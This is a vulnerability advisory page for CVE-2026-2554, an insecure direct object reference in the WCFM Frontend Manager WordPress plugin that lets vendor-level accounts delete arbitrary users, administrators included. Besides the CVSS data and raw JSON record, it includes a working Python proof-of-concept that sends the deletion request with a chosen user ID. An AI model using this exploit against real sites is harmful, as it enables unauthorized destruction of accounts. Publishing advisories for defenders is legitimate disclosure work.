Security Vulnerability Report
中文
CVE-2026-2554 CVSS 8.1 HIGH

CVE-2026-2554

Published: 2026-05-02 14:16:18
Last Modified: 2026-05-05 19:15:06
Source: [email protected]

Description

The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WCFM – Frontend Manager for WooCommerce <= 6.7.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_delete_user(target_url, attacker_cookie, target_user_id): """ Exploit for CVE-2026-2554 IDOR vulnerability. Deletes a user by ID using a low-privilege vendor account. """ # The endpoint is typically wp-admin/admin-ajax.php endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload data data = { 'action': 'wcfm_delete_wcfm_customer', 'customerid': target_user_id } # Headers and Cookies headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/x-www-form-urlencoded' } cookies = { 'wordpress_logged_in_xxx': attacker_cookie # Replace with actual cookie } try: response = requests.post(endpoint, data=data, headers=headers, cookies=cookies) if response.status_code == 200: print(f"[+] Request sent to delete user ID: {target_user_id}") print(f"[+] Response: {response.text}") else: print(f"[-] Failed to send request. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Example usage # exploit_delete_user('http://target-site.com', 'attacker_cookie_value', '1')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2554", "sourceIdentifier": "[email protected]", "published": "2026-05-02T14:16:17.707", "lastModified": "2026-05-05T19:15:06.200", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3483695/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.